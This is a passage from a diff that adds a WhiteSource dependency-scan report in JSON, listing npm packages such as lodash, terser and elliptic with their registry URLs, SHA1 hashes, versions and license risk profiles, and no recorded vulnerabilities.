"https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/72f6c91d-e85e-4464-8422-c66014d33d59" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "792c0063-c2af-44ed-a05b-3e917363f737", + "keyId": 27818913, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.5.5.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/code-frame" + }, + "matchType": "SHA1", + "sha1": "bc0782f6d69f7b7d49531219699b988f669a8f9d", + "name": "code-frame-7.5.5.tgz", + "artifactId": "code-frame-7.5.5.tgz", + "version": "7.5.5", + "groupId": "@babel/code-frame", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f2e43ada-11f0-4047-a465-c86be51e8d04" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ebce3131-c3c1-468d-953d-4e218b073a30", + "keyId": 28170484, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-1.2.7.tgz", + "homePage": "https://github.com/npm/fs-minipass#readme", + "genericPackageIndex": "https://www.npmjs.org/package/fs-minipass" + }, + "matchType": "SHA1", + "sha1": "ccff8570841e7fe4265693da88936c55aed7f7c7", + "name": "fs-minipass-1.2.7.tgz", + "artifactId": "fs-minipass-1.2.7.tgz", + "version": "1.2.7", + "groupId": "fs-minipass", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "Project home page", + "reference": "https://github.com/npm/fs-minipass/blob/v1.2.7/LICENSE" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "46cb1552-2a19-4b75-b660-d78e3e957829", + "keyId": 28084502, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/async-sema/-/async-sema-3.0.0.tgz", + "homePage": "https://github.com/zeit/async-sema", + "genericPackageIndex": "https://www.npmjs.org/package/async-sema" + }, + "matchType": "SHA1", + "sha1": "9e22d6783f0ab66a1cf330e21a905e39b3b3a975", + "name": "async-sema-3.0.0.tgz", + "artifactId": "async-sema-3.0.0.tgz", + "version": "3.0.0", + "groupId": "async-sema", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/async-sema" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "03549f3f-6aac-462c-b0ea-1229432884ac", + "keyId": 27539918, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/find-up/-/find-up-4.0.0.tgz", + "homePage": "https://github.com/sindresorhus/find-up#readme", + "genericPackageIndex": "https://www.npmjs.org/package/find-up" + }, + "matchType": "SHA1", + "sha1": "c367f8024de92efb75f2d4906536d24682065c3a", + "name": "find-up-4.0.0.tgz", + "artifactId": "find-up-4.0.0.tgz", + "version": "4.0.0", + "groupId": "find-up", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/find-up/v/4.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f103353e-dc12-46a2-853b-0f1656925788", + "keyId": 28432206, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/djv/-/djv-2.1.2.tgz", + "homePage": "https://github.com/korzio/djv#readme", + "genericPackageIndex": "https://www.npmjs.org/package/djv" + }, + "matchType": "SHA1", + "sha1": "5bf4344cdd5f7df82764d99a4f0684899d570216", + "name": "djv-2.1.2.tgz", + "artifactId": "djv-2.1.2.tgz", + "version": "2.1.2", + "groupId": "djv", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1846f9b0-0973-477b-b0a6-b46aacf3f8ac" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b3c175f0-e035-49a3-bf91-877d773755c6", + "keyId": 26967817, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/tmp/-/tmp-0.0.29.tgz", + "homePage": "http://github.com/raszi/node-tmp", + "genericPackageIndex": "https://www.npmjs.org/package/tmp" + }, + "matchType": "SHA1", + "sha1": "f25125ff0dd9da3ccb0c2dd371ee1288bb9128c0", + "name": "tmp-0.0.29.tgz", + "artifactId": "tmp-0.0.29.tgz", + "version": "0.0.29", + "groupId": "tmp", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b49a0717-33da-4f9d-bc28-e6a90a7026af" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e99a61f2-4b24-4996-b239-c2ba062949b6", + "keyId": 28432167, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-toast/-/honeyui-toast-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/toast#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-toast" + }, + "matchType": "SHA1", + "sha1": "918d9c7948c53e23d250aa6a5c9e32ee3ed94752", + "name": "honeyui-toast-1.1.1.tgz", + "artifactId": "honeyui-toast-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-toast", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7b2dca1a-7db6-4d7c-ae52-5ed28c6078d0", + "keyId": 26963134, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/text-hex/-/text-hex-1.0.0.tgz", + "homePage": "https://github.com/3rd-Eden/text-hex", + "genericPackageIndex": "https://www.npmjs.org/package/text-hex" + }, + "matchType": "SHA1", + "sha1": "69dc9c1b17446ee79a92bf5b884bb4b9127506f5", + "name": "text-hex-1.0.0.tgz", + "artifactId": "text-hex-1.0.0.tgz", + "version": "1.0.0", + "groupId": "text-hex", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/494390de-dd13-40b4-b4f1-d77a869b79ae" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "10f62fa0-d30e-47d7-a2ec-0988007f2573", + "keyId": 27514059, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ora/-/ora-3.4.0.tgz", + "homePage": "https://github.com/sindresorhus/ora#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ora" + }, + "matchType": "SHA1", + "sha1": "bf0752491059a3ef3ed4c85097531de9fdbcd318", + "name": "ora-3.4.0.tgz", + "artifactId": "ora-3.4.0.tgz", + "version": "3.4.0", + "groupId": "ora", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e3491a5d-7c40-4176-8be4-93e25cb57132" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d535da3c-6363-4bdc-b0fb-c5e5164fa10a", + "keyId": 28292906, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/minizlib/-/minizlib-1.3.3.tgz", + "homePage": "https://github.com/isaacs/minizlib#readme", + "genericPackageIndex": "https://www.npmjs.org/package/minizlib" + }, + "matchType": "SHA1", + "sha1": "2290de96818a34c29551c8a8d301216bd65a861d", + "name": "minizlib-1.3.3.tgz", + "artifactId": "minizlib-1.3.3.tgz", + "version": "1.3.3", + "groupId": "minizlib", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/minizlib/v/1.3.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e3cf6c04-7a91-4ad9-b0b7-b940668c8501", + "keyId": 28432132, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-badge/-/honeyui-badge-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/badge#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-badge" + }, + "matchType": "SHA1", + "sha1": "b47da28c781eb317f421f7d9df1de6e4cf35324a", + "name": "honeyui-badge-1.1.1.tgz", + "artifactId": "honeyui-badge-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-badge", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b5b5f491-896c-410f-bda4-0e0a2e1912f0", + "keyId": 26963116, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/enabled/-/enabled-1.0.2.tgz", + "homePage": "https://github.com/bigpipe/enabled#readme", + "genericPackageIndex": "https://www.npmjs.org/package/enabled" + }, + "matchType": "SHA1", + "sha1": "965f6513d2c2d1c5f4652b64a2e3396467fc2f93", + "name": "enabled-1.0.2.tgz", + "artifactId": "enabled-1.0.2.tgz", + "version": "1.0.2", + "groupId": "enabled", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/enabled" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d7d7dee9-1c2e-44ff-be54-9a177330c082", + "keyId": 26967843, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/inquirer/-/inquirer-2.0.0.tgz", + "homePage": "https://github.com/sboudrias/Inquirer.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/inquirer" + }, + "matchType": "SHA1", + "sha1": "e1351687b90d150ca403ceaa3cefb1e3065bef4b", + "name": "inquirer-2.0.0.tgz", + "artifactId": "inquirer-2.0.0.tgz", + "version": "2.0.0", + "groupId": "inquirer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3c646a7f-7168-4198-ac23-405edb62b1c4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "910813d2-ae13-4aa0-a6ed-b6d24b828bf4", + "keyId": 28084471, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-plugin-transform-define/-/babel-plugin-transform-define-1.3.1.tgz", + "homePage": "https://github.com/FormidableLabs/babel-plugin-transform-define", + "genericPackageIndex": "https://www.npmjs.org/package/babel-plugin-transform-define" + }, + "matchType": "SHA1", + "sha1": "b21b7bad3b84cf8e3f07cdc8c660b99cbbc01213", + "name": "babel-plugin-transform-define-1.3.1.tgz", + "artifactId": "babel-plugin-transform-define-1.3.1.tgz", + "version": "1.3.1", + "groupId": "babel-plugin-transform-define", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-plugin-transform-define/v/1.3.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9cca9f76-6247-4c62-9bc1-5765b2a295be", + "keyId": 27871132, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/idtoken-verifier/-/idtoken-verifier-1.4.1.tgz", + "homePage": "https://github.com/auth0/idtoken-verifier#readme", + "genericPackageIndex": "https://www.npmjs.org/package/idtoken-verifier" + }, + "matchType": "SHA1", + "sha1": "032d7720fdd091830d22f694eb94b5f6644b0d3b", + "name": "idtoken-verifier-1.4.1.tgz", + "artifactId": "idtoken-verifier-1.4.1.tgz", + "version": "1.4.1", + "groupId": "idtoken-verifier", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c868109b-8c8f-4b2c-b483-5f76b44b8365" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f2a975db-cdda-4738-b12b-cec0833ff76a", + "keyId": 27817693, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.5.tgz", + "homePage": "https://github.com/shinnn/spdx-license-ids#readme", + "genericPackageIndex": "https://www.npmjs.org/package/spdx-license-ids" + }, + "matchType": "SHA1", + "sha1": "3694b5804567a458d3c8045842a6358632f62654", + "name": "spdx-license-ids-3.0.5.tgz", + "artifactId": "spdx-license-ids-3.0.5.tgz", + "version": "3.0.5", + "groupId": "spdx-license-ids", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/spdx-license-ids" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ed637891-ae2a-4248-af17-a686939db5a8", + "keyId": 27090357, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/recast/-/recast-0.15.5.tgz", + "homePage": "http://github.com/benjamn/recast", + "genericPackageIndex": "https://www.npmjs.org/package/recast" + }, + "matchType": "SHA1", + "sha1": "6871177ee26720be80d7624e4283d5c855a5cb0b", + "name": "recast-0.15.5.tgz", + "artifactId": "recast-0.15.5.tgz", + "version": "0.15.5", + "groupId": "recast", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e9e3f74d-2f33-44ce-aa37-7afd3373f2d3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7c5db556-2a4d-4931-8dee-7f980d8c43c4", + "keyId": 27100387, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-focus-within/-/postcss-focus-within-3.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-focus-within#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-focus-within" + }, + "matchType": "SHA1", + "sha1": "763b8788596cee9b874c999201cdde80659ef680", + "name": "postcss-focus-within-3.0.0.tgz", + "artifactId": "postcss-focus-within-3.0.0.tgz", + "version": "3.0.0", + "groupId": "postcss-focus-within", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e9dc7393-36d2-43c5-8d69-bb70d3b3bba9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "69a979a0-5e14-4498-b599-60612cc135f6", + "keyId": 27798173, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.template/-/lodash.template-4.5.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.template" + }, + "matchType": "SHA1", + "sha1": "f976195cf3f347d0d5f52483569fe8031ccce8ab", + "name": "lodash.template-4.5.0.tgz", + "artifactId": "lodash.template-4.5.0.tgz", + "version": "4.5.0", + "groupId": "lodash.template", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.template/v/4.5.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8b445d19-d768-440e-963d-70cd7a906f09", + "keyId": 28432146, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-card/-/honeyui-card-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/card#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-card" + }, + "matchType": "SHA1", + "sha1": "355b27d9a1ad8dc9f197bba93c3b178e27e1dbdf", + "name": "honeyui-card-1.1.1.tgz", + "artifactId": "honeyui-card-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-card", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3f87a98b-2d86-4307-8fbd-4190f7c14734", + "keyId": 27129390, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/dir-glob/-/dir-glob-2.2.2.tgz", + "homePage": "https://github.com/kevva/dir-glob#readme", + "genericPackageIndex": "https://www.npmjs.org/package/dir-glob" + }, + "matchType": "SHA1", + "sha1": "fa09f0694153c8918b18ba0deafae94769fc50c4", + "name": "dir-glob-2.2.2.tgz", + "artifactId": "dir-glob-2.2.2.tgz", + "version": "2.2.2", + "groupId": "dir-glob", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f73f5749-c27c-44e7-9f5e-28d0ed4602da" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e4f96ecf-3aa4-4d18-a55e-f65e53779ba1", + "keyId": 28050415, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/elliptic/-/elliptic-6.5.1.tgz", + "homePage": "https://github.com/indutny/elliptic", + "genericPackageIndex": "https://www.npmjs.org/package/elliptic" + }, + "matchType": "SHA1", + "sha1": "c380f5f909bf1b9b4428d028cd18d3b0efd6b52b", + "name": "elliptic-6.5.1.tgz", + "artifactId": "elliptic-6.5.1.tgz", + "version": "6.5.1", + "groupId": "elliptic", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/indutny/elliptic/blob/v6.5.1/package.json" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cd711d5f-db91-42a8-9c58-98421d227657", + "keyId": 27557124, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/terser/-/terser-4.0.0.tgz", + "homePage": "https://github.com/fabiosantoscode/terser", + "genericPackageIndex": "https://www.npmjs.org/package/terser" + }, + "matchType": "SHA1", + "sha1": "ef356f6f359a963e2cc675517f21c1c382877374", + "name": "terser-4.0.0.tgz", + "artifactId": "terser-4.0.0.tgz", + "version": "4.0.0", + "groupId": "terser", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/61ebb245-d61f-41ab-a2ee-f42eaad4ebf5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9eaca835-5b13-4718-b7da-f6fa7f28a21b", + "keyId": 28344461, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.5.tgz", + "homePage": "https://github.com/npm/hosted-git-info", + "genericPackageIndex": "https://www.npmjs.org/package/hosted-git-info" + }, + "matchType": "SHA1", + "sha1": "759cfcf2c4d156ade59b0b2dfabddc42a6b9c70c", + "name": "hosted-git-info-2.8.5.tgz", + "artifactId": "hosted-git-info-2.8.5.tgz", + "version": "2.8.5", + "groupId": "hosted-git-info", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/hosted-git-info/v/2.8.5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9e539f23-7b39-435b-91f1-a1a8bd2012f8", + "keyId": 27829505, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash/-/lodash-4.17.15.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash" + }, + "matchType": "SHA1", + "sha1": "b447f6670a0455bbfeedd11392eff330ea097548", + "name": "lodash-4.17.15.tgz", + "artifactId": "lodash-4.17.15.tgz", + "version": "4.17.15", + "groupId": "lodash", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "691cd397-3dfb-46f2-9251-7c1dd073d91d", + "keyId": 28432151, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/emojilib/-/emojilib-2.4.0.tgz", + "homePage": "https://github.com/muan/emojilib#readme", + "genericPackageIndex": "https://www.npmjs.org/package/emojilib" + }, + "matchType": "SHA1", + "sha1": "ac518a8bb0d5f76dda57289ccb2fdf9d39ae721e", + "name": "emojilib-2.4.0.tgz", + "artifactId": "emojilib-2.4.0.tgz", + "version": "2.4.0", + "groupId": "emojilib", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/emojilib" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dc4c5b08-d141-40a0-be64-42df1e4182e7", + "keyId": 26965822, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/thenify/-/thenify-3.3.0.tgz", + "homePage": "https://github.com/thenables/thenify#readme", + "genericPackageIndex": "https://www.npmjs.org/package/thenify" + }, + "matchType": "SHA1", + "sha1": "e69e38a1babe969b0108207978b9f62b88604839", + "name": "thenify-3.3.0.tgz", + "artifactId": "thenify-3.3.0.tgz", + "version": "3.3.0", + "groupId": "thenify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/thenify" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bc45d043-85be-436f-a687-cc71c65410cf", + "keyId": 27871115, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-nesting/-/postcss-nesting-7.0.1.tgz", + "homePage": "https://github.com/jonathantneal/postcss-nesting#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-nesting" + }, + "matchType": "SHA1", + "sha1": "b50ad7b7f0173e5b5e3880c3501344703e04c052", + "name": "postcss-nesting-7.0.1.tgz", + "artifactId": "postcss-nesting-7.0.1.tgz", + "version": "7.0.1", + "groupId": "postcss-nesting", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1f3e4a86-ea39-47ca-aa06-fc1fd6bbe5bd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5a375a32-f4a1-430e-a9a5-bd90762bf370", + "keyId": 28432142, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jsonlines/-/jsonlines-0.1.1.tgz", + "homePage": "https://github.com/LinusU/node-jsonlines#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jsonlines" + }, + "matchType": "SHA1", + "sha1": "4fcd246dc5d0e38691907c44ab002f782d1d94cc", + "name": "jsonlines-0.1.1.tgz", + "artifactId": "jsonlines-0.1.1.tgz", + "version": "0.1.1", + "groupId": "jsonlines", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/jsonlines/v/0.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c9193c2c-b718-4241-a572-71df322a8023", + "keyId": 27100288, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-dir-pseudo-class/-/postcss-dir-pseudo-class-5.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-dir-pseudo-class#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-dir-pseudo-class" + }, + "matchType": "SHA1", + "sha1": "6e3a4177d0edb3abcc85fdb6fbb1c26dabaeaba2", + "name": "postcss-dir-pseudo-class-5.0.0.tgz", + "artifactId": "postcss-dir-pseudo-class-5.0.0.tgz", + "version": "5.0.0", + "groupId": "postcss-dir-pseudo-class", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-dir-pseudo-class" + } + ], + 